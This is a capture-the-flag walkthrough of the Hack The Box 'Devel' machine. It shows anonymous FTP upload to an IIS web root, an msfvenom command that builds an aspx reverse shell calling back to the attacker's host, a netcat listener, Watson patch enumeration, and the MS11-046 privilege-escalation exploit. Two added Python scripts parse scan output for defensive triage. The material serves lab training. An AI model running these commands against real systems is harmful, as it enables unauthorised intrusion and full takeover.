
Hack The Box - Devel Writeup

Devel Logo

IP: 10.10.10.5
OS: Windows
Difficulty: Easy
Release Date: 15 March 2017

Enumeration

As with any machine on HackTheBox, the first step is to run an nmap scan to find open ports and running services.

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 11:19 EDT
Nmap scan report for 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/Devel.

FTP

The nmap scan reveals an open FTP service with anonymous login enabled, and nmap shows the directory listing for the anonymous user. The files in this listing (aspnet_client, iisstart.htm, welcome.png) look like the default start page files of a Microsoft IIS web server, which suggests the FTP root is the web server's document root.

HTTP

Opening the host in the browser confirms what the FTP listing suggests: the site serves the default IIS start page.
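The two findings above (anonymous FTP whose root looks like an IIS web root, and a risky HTTP method) are exactly the kind of thing that is easy to miss in a long scan. The following Python script is an added example, not part of the original writeup: it parses the relevant lines of the nmap -sC -sV output shown above (embedded here as a constructed sample) and reports those misconfigurations so a scan over many hosts can be triaged automatically. The port and script-line regexes are my own assumptions about nmap's normal text layout; the IIS default file names are the ones listed in the scan.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the port and script lines from the scan above.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# "21/tcp open  ftp     Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# A script header is "| name: ..." or "|_name: ..."; continuation lines are
# indented further ("|_  SYST: ..."), so exactly one char may follow the pipe.
SCRIPT_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")

# Files that ship in the default IIS 7.x web root (taken from the listing above).
IIS_ROOT_MARKERS = {"aspnet_client", "iisstart.htm", "welcome.png"}


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> output lines


def parse_nmap(text):
    """Parse the port table of nmap's normal output, grouping NSE script lines by port."""
    ports, current_port, current_script = [], None, None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current_port = Port(int(m.group(1)), m.group(2), m.group(3),
                                m.group(4), m.group(5).strip())
            ports.append(current_port)
            current_script = None
            continue
        if current_port is None or not raw.startswith("|"):
            continue
        m = SCRIPT_RE.match(raw)
        if m:
            current_script = m.group(1)
            lines = current_port.scripts.setdefault(current_script, [])
            if m.group(2).strip():
                lines.append(m.group(2).strip())
            continue
        if current_script is not None:
            body = raw[1:]
            body = body[1:] if body.startswith("_") else body
            current_port.scripts[current_script].append(body.strip())
    return ports


def audit(ports):
    """Return human-readable findings for the misconfigurations discussed in the writeup."""
    findings = []
    for p in ports:
        tag = f"{p.number}/{p.proto}"
        anon = p.scripts.get("ftp-anon", [])
        if any("Anonymous FTP login allowed" in line for line in anon):
            findings.append(f"{tag}: anonymous FTP login allowed")
            # The listing lines end with the file name; match them against IIS defaults.
            listed = {line.split()[-1] for line in anon
                      if line.split() and not line.startswith("Anonymous")}
            hits = sorted(listed & IIS_ROOT_MARKERS)
            if hits:
                findings.append(f"{tag}: anonymous FTP root contains IIS default web-root "
                                f"files ({', '.join(hits)}); if writable, uploads are web-reachable")
        for line in p.scripts.get("http-methods", []):
            if "Potentially risky methods" in line:
                findings.append(f"{tag}: risky HTTP methods enabled: "
                                f"{line.split(':', 1)[1].strip()}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_nmap(NMAP_OUTPUT)):
        print(finding)
```

Running the script against the sample prints three findings: the anonymous login, the IIS-looking FTP root (the combination that makes this box exploitable), and the TRACE method. On a real engagement the same parser can be pointed at nmap's saved normal output (-oN) for a whole subnet.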

FTP Server

Connecting to FTP

Using the built-in Linux ftp client we can connect to the server. cd into our working directory and connect by running the command ftp 10.10.10.5. When asked for a username we can connect with the name anonymous. The server then asks for an e-mail address as a password; this can be ignored and left empty.

Testing file upload

Now that we are connected we should test file upload. Open a new terminal session, cd into our working directory again and create a new file with the command touch test.txt. This creates an empty file with the name test.txt.

Back in the terminal session connected to the FTP server, upload the file with the command put test.txt. The server should respond that the file has been uploaded successfully.

Once the file has been uploaded we can check whether the FTP root is the web server's document root by browsing to http://10.10.10.5/test.txt. If successful, this loads a blank page instead of an error page, confirming that anything uploaded over anonymous FTP is served by IIS.

Exploiting file upload

Now that we have established we have file upload capabilities we can exploit this to open a reverse shell.

Generating reverse shell payload (MSFVenom)

To establish a connection for our reverse shell we will use a .aspx payload generated via MSFVenom using the command below, setting LHOST to our Kali machine IP and LPORT to the port we will listen on.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4455 -f aspx > shell.aspx

Upload shell.aspx

With our shell.aspx file generated we can now upload it the same way as test.txt.

  • ftp 10.10.10.5
  • Login with user anonymous
  • put shell.aspx

Open netcat listener

To receive the connection from the reverse shell we need to open a netcat listener. Open a new terminal session and run the command nc -nvlp 4455, using the same port number as in the MSFVenom payload.

Establish shell connection

With the payload uploaded via FTP and our listener open, we can establish the connection by navigating to http://10.10.10.5/shell.aspx in a web browser, which makes IIS execute the uploaded page.

After a few moments our netcat listener will show the output below.

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

We now have shell access to the box as the low-privileged IIS (inet) user.

Privilege escalation

With shell access to the box we can now enumerate the system to find our path to Administrator access.

Watson

To find out whether there are any known kernel exploits for this build of Windows we will upload and run Watson.

  • Download WatsonNet3.5AnyCPU.exe from the GitHub repo
  • Copy this file to our working directory
  • IMPORTANT: in our FTP session switch to binary transfer mode by running the command binary (in the default ASCII mode the client rewrites line endings and corrupts the executable)
  • Upload the file with put WatsonNet3.5AnyCPU.exe
  • On our reverse shell session set our directory to the IIS document root with cd /inetpub/wwwroot/
  • Run Watson with WatsonNet3.5AnyCPU.exe

After a few moments we should see the output below. Watson has found several missing patches for this build of Windows and suggests available exploits.

WatsonNet3.5AnyCPU.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v0.1    
                                   
                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)
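Watson's report is a list of missing patches as much as it is a list of exploits, and on a real host it is the patch side that matters to whoever has to fix the box. The Python below is an added example, not part of the writeup or of Watson: it parses the report shown above (embedded as a constructed sample, with the descriptions abridged) into structured findings, checks that the trailer count matches what was parsed (a guard against truncated output), and returns the bulletins still outstanding after a set of confirmed remediations, tagged with where Watson says a public exploit lives so they can be prioritised. The regexes and the confirmed_patched set are my own assumptions.

```python
import re

# Constructed sample: the Watson output above without the banner; descriptions abridged.
WATSON_OUTPUT = r"""
 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: Task Scheduler only uses a CRC32 checksum to validate task files.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) does not properly validate user-mode input.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: EoP in the way the Windows User Mode Scheduler handles system requests.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Window broadcast messages are not isolated across Integrity Levels.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)
"""

HEADER_RE = re.compile(r"^\s*\[\*\]\s+(OS Build number|CPU Address Width):\s*(\d+)")
VULN_RE = re.compile(r"^\s*\[\*\]\s+Appears vulnerable to\s+(MS\d{2}-\d{3})\s*$")
DETAIL_RE = re.compile(r"^\s*\[>\]\s+(Description|Exploit|Notes):\s*(.*)$")
FINISHED_RE = re.compile(r"^\s*\[\*\]\s+Finished\. Found (\d+) vulns")


def parse_watson(text):
    """Turn Watson's text report into a dict of host facts plus per-bulletin findings."""
    report = {"build": None, "address_width": None, "findings": [], "reported_count": None}
    current = None
    for line in text.splitlines():
        if m := VULN_RE.match(line):
            current = {"bulletin": m.group(1), "description": "", "exploit": "", "notes": ""}
            report["findings"].append(current)
        elif (m := DETAIL_RE.match(line)) and current is not None:
            current[m.group(1).lower()] = m.group(2).strip()
        elif m := HEADER_RE.match(line):
            key = "build" if m.group(1) == "OS Build number" else "address_width"
            report[key] = int(m.group(2))
        elif m := FINISHED_RE.match(line):
            report["reported_count"] = int(m.group(1))
    return report


def report_is_consistent(report):
    """The trailer count must equal the number of findings parsed; otherwise the output was cut."""
    return report["reported_count"] == len(report["findings"])


def exploit_source(url):
    """Classify where Watson points for a public exploit, for prioritisation."""
    if "exploit-db.com" in url:
        return "exploit-db"
    if "github.com/rapid7/metasploit-framework" in url:
        return "metasploit"
    return "other" if url and url != "None." else "none"


def triage(report, confirmed_patched):
    """Bulletins Watson flagged that are not in the set of remediations already confirmed."""
    outstanding = [
        {"bulletin": f["bulletin"],
         "year": 2000 + int(f["bulletin"][2:4]),  # MS11-046 -> 2011
         "source": exploit_source(f["exploit"])}
        for f in report["findings"] if f["bulletin"] not in confirmed_patched
    ]
    return sorted(outstanding, key=lambda o: o["bulletin"])


if __name__ == "__main__":
    rep = parse_watson(WATSON_OUTPUT)
    print(f"build {rep['build']}, {rep['address_width']}-bit, consistent={report_is_consistent(rep)}")
    # Hypothetical: the first two bulletins have already been confirmed as installed.
    for item in triage(rep, {"MS10-073", "MS10-092"}):
        print(item)
```

The triage output for the sample lists MS11-046, MS12-042 and MS13-005 as still outstanding, with the two Metasploit-backed entries and the exploit-db entry marked as such; the bulletin year makes the age of the oldest missing patch obvious at a glance.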

Exploiting MS11-046

After looking through the exploits Watson suggested, we will use the MS11-046 (CVE-2011-1249) exploit, as we are trying to complete this box without using Metasploit.

  • Download the exploit from the SecWiki GitHub repo
  • Copy ms11-046.exe to the working directory
  • Make sure the FTP session is still in binary mode
  • Upload with put ms11-046.exe
  • Run the exploit in our shell session by running ms11-046.exe in the /inetpub/wwwroot folder.

The exploit will run but will not show any output. To check whether it was successful we can run the command whoami, which should reveal we are now running as nt authority\system.

This box is now completed, and the user and root flags can be found in their respective folders under Users.

This post is licensed under CC BY 4.0 by the author.